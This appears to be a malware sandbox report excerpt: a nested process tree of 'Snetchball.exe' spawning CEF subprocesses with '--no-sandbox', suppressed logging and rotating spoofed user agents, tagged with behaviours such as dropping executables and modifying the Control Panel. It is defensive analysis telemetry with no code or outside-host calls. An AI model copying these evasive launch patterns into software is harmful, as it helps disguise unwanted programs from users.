C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1204 --field-trial-handle=2816,i,887523644323439315,14936490487706116949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:112⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2328
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3992 --field-trial-handle=2816,i,887523644323439315,14936490487706116949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:112⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2708
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3840 --field-trial-handle=2816,i,887523644323439315,14936490487706116949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:112⤵PID:2292
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3960 --field-trial-handle=2816,i,887523644323439315,14936490487706116949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:112⤵PID:1444
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5192 --field-trial-handle=2816,i,887523644323439315,14936490487706116949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:112⤵
- System Location Discovery: System Language Discovery
PID:5568
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=6052 --field-trial-handle=2816,i,887523644323439315,14936490487706116949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:212⤵PID:1512
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=4696 --field-trial-handle=2816,i,887523644323439315,14936490487706116949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:812⤵PID:2756
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
- Drops file in Windows directory
- Modifies Control Panel
PID:4608 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2900 --field-trial-handle=2904,i,7013769394297221250,4341844704181784694,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:213⤵
- System Location Discovery: System Language Discovery
PID:1444
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3116 --field-trial-handle=2904,i,7013769394297221250,4341844704181784694,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:813⤵PID:5208
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3120 --field-trial-handle=2904,i,7013769394297221250,4341844704181784694,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:813⤵PID:908
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3140 --field-trial-handle=2904,i,7013769394297221250,4341844704181784694,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:113⤵PID:5500
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3224 --field-trial-handle=2904,i,7013769394297221250,4341844704181784694,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:113⤵PID:3064
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
- Modifies Control Panel
PID:5348 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"15⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Control Panel
PID:5412 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2804 --field-trial-handle=2808,i,6899308284805131333,6803255543024129591,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:216⤵PID:4724
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3104 --field-trial-handle=2808,i,6899308284805131333,6803255543024129591,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:816⤵
- System Location Discovery: System Language Discovery
PID:4156
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3108 --field-trial-handle=2808,i,6899308284805131333,6803255543024129591,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:816⤵PID:4768
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3128 --field-trial-handle=2808,i,6899308284805131333,6803255543024129591,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:116⤵
- System Location Discovery: System Language Discovery
PID:5580 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"17⤵
- Modifies Control Panel
PID:3164 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵
- Drops file in Windows directory
- Modifies Control Panel
PID:5912 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2796 --field-trial-handle=2800,i,15199599118523772204,7514863580858340400,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:219⤵PID:6052
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3092 --field-trial-handle=2800,i,15199599118523772204,7514863580858340400,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:819⤵
- System Location Discovery: System Language Discovery
PID:4676
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3104 --field-trial-handle=2800,i,15199599118523772204,7514863580858340400,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:819⤵PID:3400
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3124 --field-trial-handle=2800,i,15199599118523772204,7514863580858340400,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:119⤵PID:888
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3128 --field-trial-handle=2800,i,15199599118523772204,7514863580858340400,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:119⤵PID:5712
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3952 --field-trial-handle=2800,i,15199599118523772204,7514863580858340400,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:119⤵PID:3604
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
- System Location Discovery: System Language Discovery
- Modifies Control Panel
PID:2120 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"21⤵
- Drops file in Windows directory
- Modifies Control Panel
PID:580 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2796 --field-trial-handle=2800,i,1155034535005275803,3165242097991843425,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:222⤵PID:5752
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3120 --field-trial-handle=2800,i,1155034535005275803,3165242097991843425,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:822⤵PID:2660
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3124 --field-trial-handle=2800,i,1155034535005275803,3165242097991843425,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:822⤵PID:5168
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3144 --field-trial-handle=2800,i,1155034535005275803,3165242097991843425,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:122⤵
- System Location Discovery: System Language Discovery
PID:6020
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3148 --field-trial-handle=2800,i,1155034535005275803,3165242097991843425,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:122⤵PID:5296
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"23⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies Control Panel
PID:5260 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.2" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2800 --field-trial-handle=2808,i,11701412828149059620,4505377049796945242,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:224⤵
- System Location Discovery: System Language Discovery
PID:4644
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.2" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2956 --field-trial-handle=2808,i,11701412828149059620,4505377049796945242,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:824⤵PID:5396
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.2" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2992 --field-trial-handle=2808,i,11701412828149059620,4505377049796945242,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:824⤵
- System Location Discovery: System Language Discovery
PID:4068
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 AlohaBrowser/6.6.2" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3084 --field-trial-handle=2808,i,11701412828149059620,4505377049796945242,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:124⤵PID:3972
-
-
